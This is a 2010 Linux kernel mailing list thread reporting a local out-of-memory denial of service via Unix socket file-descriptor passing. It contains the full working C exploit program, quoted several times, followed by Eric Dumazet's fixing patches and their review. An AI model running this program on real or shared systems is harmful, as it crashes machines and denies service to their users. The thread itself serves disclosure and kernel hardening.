All of lore.kernel.org
 help / color / mirror / Atom feed
* Unix socket local DOS (OOM)
@ 2010-11-23 22:21 Vegard Nossum
  2010-11-23 23:11 ` Eric Dumazet
  0 siblings, 1 reply; 13+ messages in thread
From: Vegard Nossum @ 2010-11-23 22:21 UTC (permalink / raw)
  To: LKML; +Cc: Andrew Morton, Eugene Teo

Hi,

I found this program lying around on my laptop. It kills my box
(2.6.35) instantly by consuming a lot of memory (allocated by the
kernel, so the process doesn't get killed by the OOM killer). As far
as I can tell, the memory isn't being freed when the program exits
either. Maybe it will eventually get cleaned up the UNIX socket
garbage collector thing, but in that case it doesn't get called
quickly enough to save my machine at least.

#include <sys/mount.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static int send_fd(int unix_fd, int fd)
{
        struct msghdr msgh;
        struct cmsghdr *cmsg;
        char buf[CMSG_SPACE(sizeof(fd))];

        memset(&msgh, 0, sizeof(msgh));

        memset(buf, 0, sizeof(buf));
        msgh.msg_control = buf;
        msgh.msg_controllen = sizeof(buf);

        cmsg = CMSG_FIRSTHDR(&msgh);
        cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
        cmsg->cmsg_level = SOL_SOCKET;
        cmsg->cmsg_type = SCM_RIGHTS;

        msgh.msg_controllen = cmsg->cmsg_len;

        memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
        return sendmsg(unix_fd, &msgh, 0);
}

int main(int argc, char *argv[])
{
        while (1) {
                pid_t child;

                child = fork();
                if (child == -1)
                        exit(EXIT_FAILURE);

                if (child == 0) {
                        int fd[2];
                        int i;

                        if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
                                goto out_error;

                        for (i = 0; i < 100; ++i) {
                                if (send_fd(fd[0], fd[0]) == -1)
                                        goto out_error;

                                if (send_fd(fd[1], fd[1]) == -1)
                                        goto out_error;
                        }

                        close(fd[0]);
                        close(fd[1]);
                        goto out;

                out_error:
                        fprintf(stderr, "error: %s\n", strerror(errno));
                out:
                        exit(EXIT_SUCCESS);
                }

                while (1) {
                        pid_t kid;
                        int status;

                        kid = wait(&status);
                        if (kid == -1) {
                                if (errno == ECHILD)
                                        break;
                                if (errno == EINTR)
                                        continue;

                                exit(EXIT_FAILURE);
                        }

                        if (WIFEXITED(status)) {
                                if (WEXITSTATUS(status))
                                        exit(WEXITSTATUS(status));
                                break;
                        }
                }
        }

        return EXIT_SUCCESS;
}


Vegard

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: Unix socket local DOS (OOM)
  2010-11-23 22:21 Unix socket local DOS (OOM) Vegard Nossum
@ 2010-11-23 23:11 ` Eric Dumazet
  2010-11-23 23:25   ` Vegard Nossum
                     ` (2 more replies)
  0 siblings, 3 replies; 13+ messages in thread
From: Eric Dumazet @ 2010-11-23 23:11 UTC (permalink / raw)
  To: Vegard Nossum, David Miller; +Cc: LKML, Andrew Morton, Eugene Teo, netdev

Le mardi 23 novembre 2010 à 23:21 +0100, Vegard Nossum a écrit :
> Hi,
> 
> I found this program lying around on my laptop. It kills my box
> (2.6.35) instantly by consuming a lot of memory (allocated by the
> kernel, so the process doesn't get killed by the OOM killer). As far
> as I can tell, the memory isn't being freed when the program exits
> either. Maybe it will eventually get cleaned up the UNIX socket
> garbage collector thing, but in that case it doesn't get called
> quickly enough to save my machine at least.
> 
> #include <sys/mount.h>
> #include <sys/socket.h>
> #include <sys/un.h>
> #include <sys/wait.h>
> 
> #include <errno.h>
> #include <fcntl.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> 
> static int send_fd(int unix_fd, int fd)
> {
>         struct msghdr msgh;
>         struct cmsghdr *cmsg;
>         char buf[CMSG_SPACE(sizeof(fd))];
> 
>         memset(&msgh, 0, sizeof(msgh));
> 
>         memset(buf, 0, sizeof(buf));
>         msgh.msg_control = buf;
>         msgh.msg_controllen = sizeof(buf);
> 
>         cmsg = CMSG_FIRSTHDR(&msgh);
>         cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
>         cmsg->cmsg_level = SOL_SOCKET;
>         cmsg->cmsg_type = SCM_RIGHTS;
> 
>         msgh.msg_controllen = cmsg->cmsg_len;
> 
>         memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
>         return sendmsg(unix_fd, &msgh, 0);
> }
> 
> int main(int argc, char *argv[])
> {
>         while (1) {
>                 pid_t child;
> 
>                 child = fork();
>                 if (child == -1)
>                         exit(EXIT_FAILURE);
> 
>                 if (child == 0) {
>                         int fd[2];
>                         int i;
> 
>                         if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
>                                 goto out_error;
> 
>                         for (i = 0; i < 100; ++i) {
>                                 if (send_fd(fd[0], fd[0]) == -1)
>                                         goto out_error;
> 
>                                 if (send_fd(fd[1], fd[1]) == -1)
>                                         goto out_error;
>                         }
> 
>                         close(fd[0]);
>                         close(fd[1]);
>                         goto out;
> 
>                 out_error:
>                         fprintf(stderr, "error: %s\n", strerror(errno));
>                 out:
>                         exit(EXIT_SUCCESS);
>                 }
> 
>                 while (1) {
>                         pid_t kid;
>                         int status;
> 
>                         kid = wait(&status);
>                         if (kid == -1) {
>                                 if (errno == ECHILD)
>                                         break;
>                                 if (errno == EINTR)
>                                         continue;
> 
>                                 exit(EXIT_FAILURE);
>                         }
> 
>                         if (WIFEXITED(status)) {
>                                 if (WEXITSTATUS(status))
>                                         exit(WEXITSTATUS(status));
>                                 break;
>                         }
>                 }
>         }
> 
>         return EXIT_SUCCESS;
> }
> 
> 
> Vegard
> --

Hi Vegard

Do you have a patch to correct this problem ?

I suppose we should add a machine wide limit of pending struct
scm_fp_list. (percpu_counter I guess)

David, commit f8d570a4 added one "struct list_head list;" to struct
scm_fp_list, enlarging it by a two factor because of power of two
kmalloc() sizes.  (2048 bytes on 64bit arches instead of 1024
previously)

We might lower SCM_MAX_FD from 255 to 253 ?




^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: Unix socket local DOS (OOM)
  2010-11-23 23:11 ` Eric Dumazet
@ 2010-11-23 23:25   ` Vegard Nossum
  2010-11-24  0:09   ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
  2010-11-24  9:18   ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
  2 siblings, 0 replies; 13+ messages in thread
From: Vegard Nossum @ 2010-11-23 23:25 UTC (permalink / raw)
  To: Eric Dumazet; +Cc: David Miller, LKML, Andrew Morton, Eugene Teo, netdev

On 24 November 2010 00:11, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> Le mardi 23 novembre 2010 à 23:21 +0100, Vegard Nossum a écrit :
>> Hi,
>>
>> I found this program lying around on my laptop. It kills my box
>> (2.6.35) instantly by consuming a lot of memory (allocated by the
>> kernel, so the process doesn't get killed by the OOM killer). As far
>> as I can tell, the memory isn't being freed when the program exits
>> either. Maybe it will eventually get cleaned up the UNIX socket
>> garbage collector thing, but in that case it doesn't get called
>> quickly enough to save my machine at least.

>
> Hi Vegard
>
> Do you have a patch to correct this problem ?

No, sorry, I didn't look into it.


Vegard

^ permalink raw reply	[flat|nested] 13+ messages in thread

* [PATCH net-next-2.6] scm: lower SCM_MAX_FD
  2010-11-23 23:11 ` Eric Dumazet
  2010-11-23 23:25   ` Vegard Nossum
@ 2010-11-24  0:09   ` Eric Dumazet
  2010-11-24 19:17     ` David Miller
  2010-11-24  9:18   ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
  2 siblings, 1 reply; 13+ messages in thread
From: Eric Dumazet @ 2010-11-24  0:09 UTC (permalink / raw)
  To: Vegard Nossum, David Miller; +Cc: LKML, Andrew Morton, Eugene Teo, netdev


> David, commit f8d570a4 added one "struct list_head list;" to struct
> scm_fp_list, enlarging it by a two factor because of power of two
> kmalloc() sizes.  (2048 bytes on 64bit arches instead of 1024
> previously)
> 
> We might lower SCM_MAX_FD from 255 to 253 ?
> 
> 

This wont correct Vegard reported problem yet, but following patch
should reduce ram usage a lot (32 bytes instead of 2048 bytes per scm in
Vegard test program)

Thanks

[PATCH net-next-2.6] net: scm: lower SCM_MAX_FD

Lower SCM_MAX_FD from 255 to 253 so that allocations for scm_fp_list are
halved. (commit f8d570a4 added two pointers in this structure)

scm_fp_dup() should not copy whole structure (and trigger kmemcheck
warnings), but only the used part. While we are at it, only allocate
needed size.

Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
---
 include/net/scm.h |    5 +++--
 net/core/scm.c    |   10 ++++++----
 2 files changed, 9 insertions(+), 6 deletions(-)

diff --git a/include/net/scm.h b/include/net/scm.h
index 3165650..745460f 100644
--- a/include/net/scm.h
+++ b/include/net/scm.h
@@ -10,11 +10,12 @@
 /* Well, we should have at least one descriptor open
  * to accept passed FDs 8)
  */
-#define SCM_MAX_FD	255
+#define SCM_MAX_FD	253
 
 struct scm_fp_list {
 	struct list_head	list;
-	int			count;
+	short			count;
+	short			max;
 	struct file		*fp[SCM_MAX_FD];
 };
 
diff --git a/net/core/scm.c b/net/core/scm.c
index 413cab8..bbe4544 100644
--- a/net/core/scm.c
+++ b/net/core/scm.c
@@ -79,10 +79,11 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
 			return -ENOMEM;
 		*fplp = fpl;
 		fpl->count = 0;
+		fpl->max = SCM_MAX_FD;
 	}
 	fpp = &fpl->fp[fpl->count];
 
-	if (fpl->count + num > SCM_MAX_FD)
+	if (fpl->count + num > fpl->max)
 		return -EINVAL;
 
 	/*
@@ -331,11 +332,12 @@ struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)
 	if (!fpl)
 		return NULL;
 
-	new_fpl = kmalloc(sizeof(*fpl), GFP_KERNEL);
+	new_fpl = kmemdup(fpl, offsetof(struct scm_fp_list, fp[fpl->count]),
+			  GFP_KERNEL);
 	if (new_fpl) {
-		for (i=fpl->count-1; i>=0; i--)
+		for (i = 0; i < fpl->count; i++)
 			get_file(fpl->fp[i]);
-		memcpy(new_fpl, fpl, sizeof(*fpl));
+		new_fpl->max = new_fpl->count;
 	}
 	return new_fpl;
 }



^ permalink raw reply related	[flat|nested] 13+ messages in thread

* [PATCH] af_unix: limit unix_tot_inflight
  2010-11-23 23:11 ` Eric Dumazet
  2010-11-23 23:25   ` Vegard Nossum
  2010-11-24  0:09   ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
@ 2010-11-24  9:18   ` Eric Dumazet
  2010-11-24 14:44     ` Andi Kleen
  2010-11-26  8:50     ` Michal Hocko
  2 siblings, 2 replies; 13+ messages in thread
From: Eric Dumazet @ 2010-11-24  9:18 UTC (permalink / raw)
  To: Vegard Nossum, David Miller; +Cc: LKML, Andrew Morton, Eugene Teo, netdev

Le mercredi 24 novembre 2010 à 00:11 +0100, Eric Dumazet a écrit :
> Le mardi 23 novembre 2010 à 23:21 +0100, Vegard Nossum a écrit :
> > Hi,
> > 
> > I found this program lying around on my laptop. It kills my box
> > (2.6.35) instantly by consuming a lot of memory (allocated by the
> > kernel, so the process doesn't get killed by the OOM killer). As far
> > as I can tell, the memory isn't being freed when the program exits
> > either. Maybe it will eventually get cleaned up the UNIX socket
> > garbage collector thing, but in that case it doesn't get called
> > quickly enough to save my machine at least.
> > 
> > #include <sys/mount.h>
> > #include <sys/socket.h>
> > #include <sys/un.h>
> > #include <sys/wait.h>
> > 
> > #include <errno.h>
> > #include <fcntl.h>
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <unistd.h>
> > 
> > static int send_fd(int unix_fd, int fd)
> > {
> >         struct msghdr msgh;
> >         struct cmsghdr *cmsg;
> >         char buf[CMSG_SPACE(sizeof(fd))];
> > 
> >         memset(&msgh, 0, sizeof(msgh));
> > 
> >         memset(buf, 0, sizeof(buf));
> >         msgh.msg_control = buf;
> >         msgh.msg_controllen = sizeof(buf);
> > 
> >         cmsg = CMSG_FIRSTHDR(&msgh);
> >         cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
> >         cmsg->cmsg_level = SOL_SOCKET;
> >         cmsg->cmsg_type = SCM_RIGHTS;
> > 
> >         msgh.msg_controllen = cmsg->cmsg_len;
> > 
> >         memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
> >         return sendmsg(unix_fd, &msgh, 0);
> > }
> > 
> > int main(int argc, char *argv[])
> > {
> >         while (1) {
> >                 pid_t child;
> > 
> >                 child = fork();
> >                 if (child == -1)
> >                         exit(EXIT_FAILURE);
> > 
> >                 if (child == 0) {
> >                         int fd[2];
> >                         int i;
> > 
> >                         if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
> >                                 goto out_error;
> > 
> >                         for (i = 0; i < 100; ++i) {
> >                                 if (send_fd(fd[0], fd[0]) == -1)
> >                                         goto out_error;
> > 
> >                                 if (send_fd(fd[1], fd[1]) == -1)
> >                                         goto out_error;
> >                         }
> > 
> >                         close(fd[0]);
> >                         close(fd[1]);
> >                         goto out;
> > 
> >                 out_error:
> >                         fprintf(stderr, "error: %s\n", strerror(errno));
> >                 out:
> >                         exit(EXIT_SUCCESS);
> >                 }
> > 
> >                 while (1) {
> >                         pid_t kid;
> >                         int status;
> > 
> >                         kid = wait(&status);
> >                         if (kid == -1) {
> >                                 if (errno == ECHILD)
> >                                         break;
> >                                 if (errno == EINTR)
> >                                         continue;
> > 
> >                                 exit(EXIT_FAILURE);
> >                         }
> > 
> >                         if (WIFEXITED(status)) {
> >                                 if (WEXITSTATUS(status))
> >                                         exit(WEXITSTATUS(status));
> >                                 break;
> >                         }
> >                 }
> >         }
> > 
> >         return EXIT_SUCCESS;
> > }
> > 
> > 
> > Vegard
> > --

Here is a patch to address this problem.

Thanks

[PATCH] af_unix: limit unix_tot_inflight

Vegard Nossum found a unix socket OOM was possible, posting an exploit
program.

My analysis is we can eat all LOWMEM memory before unix_gc() being
called from unix_release_sock(). Moreover, the thread blocked in
unix_gc() can consume huge amount of time to perform cleanup because of
huge working set.

One way to handle this is to have a sensible limit on unix_tot_inflight,
tested from wait_for_unix_gc() and to force a call to unix_gc() if this
limit is hit.

This solves the OOM and also reduce overall latencies, and should not
slowdown normal workloads.

Reported-by: Vegard Nossum <vegard.nossum@gmail.com>
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Eugene Teo <eugene@redhat.com>
---
 net/unix/garbage.c |    7 +++++++
 1 files changed, 7 insertions(+)

diff --git a/net/unix/garbage.c b/net/unix/garbage.c
index c8df6fd..40df93d 100644
--- a/net/unix/garbage.c
+++ b/net/unix/garbage.c
@@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
 }
 
 static bool gc_in_progress = false;
+#define UNIX_INFLIGHT_TRIGGER_GC 16000
 
 void wait_for_unix_gc(void)
 {
+	/*
+	 * If number of inflight sockets is insane,
+	 * force a garbage collect right now.
+	 */
+	if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
+		unix_gc();
 	wait_event(unix_gc_wait, gc_in_progress == false);
 }
 



^ permalink raw reply related	[flat|nested] 13+ messages in thread

* Re: [PATCH] af_unix: limit unix_tot_inflight
  2010-11-24  9:18   ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
@ 2010-11-24 14:44     ` Andi Kleen
  2010-11-24 15:18       ` Eric Dumazet
  2010-11-26  8:50     ` Michal Hocko
  1 sibling, 1 reply; 13+ messages in thread
From: Andi Kleen @ 2010-11-24 14:44 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Vegard Nossum, David Miller, LKML, Andrew Morton, Eugene Teo, netdev

Eric Dumazet <eric.dumazet@gmail.com> writes:
>
> diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> index c8df6fd..40df93d 100644
> --- a/net/unix/garbage.c
> +++ b/net/unix/garbage.c
> @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
>  }
>  
>  static bool gc_in_progress = false;
> +#define UNIX_INFLIGHT_TRIGGER_GC 16000

It would be better to define this as a percentage of
lowmem.

-Andi

-- 
ak@linux.intel.com -- Speaking for myself only.

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH] af_unix: limit unix_tot_inflight
  2010-11-24 14:44     ` Andi Kleen
@ 2010-11-24 15:18       ` Eric Dumazet
  2010-11-24 16:25         ` Andi Kleen
  2010-11-24 17:14         ` David Miller
  0 siblings, 2 replies; 13+ messages in thread
From: Eric Dumazet @ 2010-11-24 15:18 UTC (permalink / raw)
  To: Andi Kleen
  Cc: Vegard Nossum, David Miller, LKML, Andrew Morton, Eugene Teo, netdev

Le mercredi 24 novembre 2010 à 15:44 +0100, Andi Kleen a écrit :
> Eric Dumazet <eric.dumazet@gmail.com> writes:
> >
> > diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> > index c8df6fd..40df93d 100644
> > --- a/net/unix/garbage.c
> > +++ b/net/unix/garbage.c
> > @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
> >  }
> >  
> >  static bool gc_in_progress = false;
> > +#define UNIX_INFLIGHT_TRIGGER_GC 16000
> 
> It would be better to define this as a percentage of
> lowmem.
> 

I knew somebody would suggest this ;)

Hmm, why bother ?

Do you think 16000 is too big ? Too small ?

1) What would be the percentage of memory ? 1%, 0.001 % ?

  On a 16TB machine, a percentage will still give huge latencies to the
poor guy that hit the unix_gc().

With 16000, the max latency I had was 11.5 ms (on an Intel E5540
@2.53GHz), instead of more than 2000 ms

I guess it would make more sense to limit to the size of cpu cache
anyway.


2) We currently allocate 4096 bytes (on x86_64) to store one file
pointer, or 2048 bytes on x86_32.

But we can store in it up to 255 files.

 I posted a patch to shrink this to 32 or 16 bytes. Should we then
change the heuristic ?

3) Really who needs more than 16000 inflight unix files ?

  (inflight unix files means : af_unix file descriptors that were sent
(sendfd()) through af_unix, not yet garbage collected.).


4) If we autotune a limit at boot time as a lowmem percentage, some guys
then want a /proc/sys/net/core/max_unix_inflight sysctl , just for
completeness. One extra sysctl... 

I cant see valid uses but programs designed to stress our stack.




^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH] af_unix: limit unix_tot_inflight
  2010-11-24 15:18       ` Eric Dumazet
@ 2010-11-24 16:25         ` Andi Kleen
  2010-11-24 17:14         ` David Miller
  1 sibling, 0 replies; 13+ messages in thread
From: Andi Kleen @ 2010-11-24 16:25 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Andi Kleen, Vegard Nossum, David Miller, LKML, Andrew Morton,
	Eugene Teo, netdev

> I knew somebody would suggest this ;)
> 
> Hmm, why bother ?
> 
> Do you think 16000 is too big ? Too small ?

I just don't like static limits. Traditionally even the ones
that seemed reasonable at some point were hit by someone
years later.

The latency issue you mention is a valid concern. I guess
an incremental GC would be overkill here ...

-Andi

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH] af_unix: limit unix_tot_inflight
  2010-11-24 15:18       ` Eric Dumazet
  2010-11-24 16:25         ` Andi Kleen
@ 2010-11-24 17:14         ` David Miller
  1 sibling, 0 replies; 13+ messages in thread
From: David Miller @ 2010-11-24 17:14 UTC (permalink / raw)
  To: eric.dumazet; +Cc: andi, vegard.nossum, linux-kernel, akpm, eugene, netdev

From: Eric Dumazet <eric.dumazet@gmail.com>
Date: Wed, 24 Nov 2010 16:18:26 +0100

> 4) If we autotune a limit at boot time as a lowmem percentage, some guys
> then want a /proc/sys/net/core/max_unix_inflight sysctl , just for
> completeness. One extra sysctl... 
> 
> I cant see valid uses but programs designed to stress our stack.

I agree completely with Eric's analysis.

I would even consider setting this threshold lower. :-)

Anyways, consider Eric's patch applied.

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH net-next-2.6] scm: lower SCM_MAX_FD
  2010-11-24  0:09   ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
@ 2010-11-24 19:17     ` David Miller
  0 siblings, 0 replies; 13+ messages in thread
From: David Miller @ 2010-11-24 19:17 UTC (permalink / raw)
  To: eric.dumazet; +Cc: vegard.nossum, linux-kernel, akpm, eugene, netdev

From: Eric Dumazet <eric.dumazet@gmail.com>
Date: Wed, 24 Nov 2010 01:09:15 +0100

> [PATCH net-next-2.6] net: scm: lower SCM_MAX_FD
> 
> Lower SCM_MAX_FD from 255 to 253 so that allocations for scm_fp_list are
> halved. (commit f8d570a4 added two pointers in this structure)
> 
> scm_fp_dup() should not copy whole structure (and trigger kmemcheck
> warnings), but only the used part. While we are at it, only allocate
> needed size.
> 
> Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>

Also applied, thanks Eric.

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH] af_unix: limit unix_tot_inflight
  2010-11-24  9:18   ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
  2010-11-24 14:44     ` Andi Kleen
@ 2010-11-26  8:50     ` Michal Hocko
  2010-11-27  2:27       ` David Miller
  1 sibling, 1 reply; 13+ messages in thread
From: Michal Hocko @ 2010-11-26  8:50 UTC (permalink / raw)
  To: stable
  Cc: Vegard Nossum, David Miller, LKML, Andrew Morton, Eugene Teo,
	netdev, Eric Dumazet

Shouldn't this go to stable?
AFAICS 2.6.32 contains the same code (the patch applies). 
I haven't tried to reproduce the issue yet.

On Wed 24-11-10 10:18:55, Eric Dumazet wrote:
> Le mercredi 24 novembre 2010 ?? 00:11 +0100, Eric Dumazet a ??crit :
> > Le mardi 23 novembre 2010 ?? 23:21 +0100, Vegard Nossum a ??crit :
> > > Hi,
> > > 
> > > I found this program lying around on my laptop. It kills my box
> > > (2.6.35) instantly by consuming a lot of memory (allocated by the
> > > kernel, so the process doesn't get killed by the OOM killer). As far
> > > as I can tell, the memory isn't being freed when the program exits
> > > either. Maybe it will eventually get cleaned up the UNIX socket
> > > garbage collector thing, but in that case it doesn't get called
> > > quickly enough to save my machine at least.
> > > 
> > > #include <sys/mount.h>
> > > #include <sys/socket.h>
> > > #include <sys/un.h>
> > > #include <sys/wait.h>
> > > 
> > > #include <errno.h>
> > > #include <fcntl.h>
> > > #include <stdio.h>
> > > #include <stdlib.h>
> > > #include <string.h>
> > > #include <unistd.h>
> > > 
> > > static int send_fd(int unix_fd, int fd)
> > > {
> > >         struct msghdr msgh;
> > >         struct cmsghdr *cmsg;
> > >         char buf[CMSG_SPACE(sizeof(fd))];
> > > 
> > >         memset(&msgh, 0, sizeof(msgh));
> > > 
> > >         memset(buf, 0, sizeof(buf));
> > >         msgh.msg_control = buf;
> > >         msgh.msg_controllen = sizeof(buf);
> > > 
> > >         cmsg = CMSG_FIRSTHDR(&msgh);
> > >         cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
> > >         cmsg->cmsg_level = SOL_SOCKET;
> > >         cmsg->cmsg_type = SCM_RIGHTS;
> > > 
> > >         msgh.msg_controllen = cmsg->cmsg_len;
> > > 
> > >         memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
> > >         return sendmsg(unix_fd, &msgh, 0);
> > > }
> > > 
> > > int main(int argc, char *argv[])
> > > {
> > >         while (1) {
> > >                 pid_t child;
> > > 
> > >                 child = fork();
> > >                 if (child == -1)
> > >                         exit(EXIT_FAILURE);
> > > 
> > >                 if (child == 0) {
> > >                         int fd[2];
> > >                         int i;
> > > 
> > >                         if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
> > >                                 goto out_error;
> > > 
> > >                         for (i = 0; i < 100; ++i) {
> > >                                 if (send_fd(fd[0], fd[0]) == -1)
> > >                                         goto out_error;
> > > 
> > >                                 if (send_fd(fd[1], fd[1]) == -1)
> > >                                         goto out_error;
> > >                         }
> > > 
> > >                         close(fd[0]);
> > >                         close(fd[1]);
> > >                         goto out;
> > > 
> > >                 out_error:
> > >                         fprintf(stderr, "error: %s\n", strerror(errno));
> > >                 out:
> > >                         exit(EXIT_SUCCESS);
> > >                 }
> > > 
> > >                 while (1) {
> > >                         pid_t kid;
> > >                         int status;
> > > 
> > >                         kid = wait(&status);
> > >                         if (kid == -1) {
> > >                                 if (errno == ECHILD)
> > >                                         break;
> > >                                 if (errno == EINTR)
> > >                                         continue;
> > > 
> > >                                 exit(EXIT_FAILURE);
> > >                         }
> > > 
> > >                         if (WIFEXITED(status)) {
> > >                                 if (WEXITSTATUS(status))
> > >                                         exit(WEXITSTATUS(status));
> > >                                 break;
> > >                         }
> > >                 }
> > >         }
> > > 
> > >         return EXIT_SUCCESS;
> > > }
> > > 
> > > 
> > > Vegard
> > > --
> 
> Here is a patch to address this problem.
> 
> Thanks
> 
> [PATCH] af_unix: limit unix_tot_inflight
> 
> Vegard Nossum found a unix socket OOM was possible, posting an exploit
> program.
> 
> My analysis is we can eat all LOWMEM memory before unix_gc() being
> called from unix_release_sock(). Moreover, the thread blocked in
> unix_gc() can consume huge amount of time to perform cleanup because of
> huge working set.
> 
> One way to handle this is to have a sensible limit on unix_tot_inflight,
> tested from wait_for_unix_gc() and to force a call to unix_gc() if this
> limit is hit.
> 
> This solves the OOM and also reduce overall latencies, and should not
> slowdown normal workloads.
> 
> Reported-by: Vegard Nossum <vegard.nossum@gmail.com>
> Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
> Cc: Andrew Morton <akpm@linux-foundation.org>
> Cc: Eugene Teo <eugene@redhat.com>
> ---
>  net/unix/garbage.c |    7 +++++++
>  1 files changed, 7 insertions(+)
> 
> diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> index c8df6fd..40df93d 100644
> --- a/net/unix/garbage.c
> +++ b/net/unix/garbage.c
> @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
>  }
>  
>  static bool gc_in_progress = false;
> +#define UNIX_INFLIGHT_TRIGGER_GC 16000
>  
>  void wait_for_unix_gc(void)
>  {
> +	/*
> +	 * If number of inflight sockets is insane,
> +	 * force a garbage collect right now.
> +	 */
> +	if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
> +		unix_gc();
>  	wait_event(unix_gc_wait, gc_in_progress == false);
>  }
>  
> 
> 
> --
> To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
> Please read the FAQ at  http://www.tux.org/lkml/

-- 
Michal Hocko
L3 team 
SUSE LINUX s.r.o.
Lihovarska 1060/12
190 00 Praha 9    
Czech Republic

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH] af_unix: limit unix_tot_inflight
  2010-11-26  8:50     ` Michal Hocko
@ 2010-11-27  2:27       ` David Miller
  2010-11-29 10:37         ` Michal Hocko
  0 siblings, 1 reply; 13+ messages in thread
From: David Miller @ 2010-11-27  2:27 UTC (permalink / raw)
  To: mhocko
  Cc: stable, vegard.nossum, linux-kernel, akpm, eugene, netdev, eric.dumazet

From: Michal Hocko <mhocko@suse.cz>
Date: Fri, 26 Nov 2010 09:50:00 +0100

> Shouldn't this go to stable?
> AFAICS 2.6.32 contains the same code (the patch applies). 
> I haven't tried to reproduce the issue yet.

I'll submit it to all the stable branches after this patch (and the
other AF_UNIX fixes recently proposed) have sat in Linus's tree for at
least half a week or so.

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH] af_unix: limit unix_tot_inflight
  2010-11-27  2:27       ` David Miller
@ 2010-11-29 10:37         ` Michal Hocko
  0 siblings, 0 replies; 13+ messages in thread
From: Michal Hocko @ 2010-11-29 10:37 UTC (permalink / raw)
  To: David Miller
  Cc: stable, vegard.nossum, linux-kernel, akpm, eugene, netdev, eric.dumazet

On Fri 26-11-10 18:27:14, David Miller wrote:
> From: Michal Hocko <mhocko@suse.cz>
> Date: Fri, 26 Nov 2010 09:50:00 +0100
> 
> > Shouldn't this go to stable?
> > AFAICS 2.6.32 contains the same code (the patch applies). 
> > I haven't tried to reproduce the issue yet.
> 
> I'll submit it to all the stable branches after this patch (and the
> other AF_UNIX fixes recently proposed) have sat in Linus's tree for at
> least half a week or so.

OK, thanks!

-- 
Michal Hocko
L3 team 
SUSE LINUX s.r.o.
Lihovarska 1060/12
190 00 Praha 9    
Czech Republic

^ permalink raw reply	[flat|nested] 13+ messages in thread

end of thread, other threads:[~2010-11-29 10:37 UTC | newest]

Thread overview: 13+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2010-11-23 22:21 Unix socket local DOS (OOM) Vegard Nossum
2010-11-23 23:11 ` Eric Dumazet
2010-11-23 23:25   ` Vegard Nossum
2010-11-24  0:09   ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
2010-11-24 19:17     ` David Miller
2010-11-24  9:18   ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
2010-11-24 14:44     ` Andi Kleen
2010-11-24 15:18       ` Eric Dumazet
2010-11-24 16:25         ` Andi Kleen
2010-11-24 17:14         ` David Miller
2010-11-26  8:50     ` Michal Hocko
2010-11-27  2:27       ` David Miller
2010-11-29 10:37         ` Michal Hocko

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.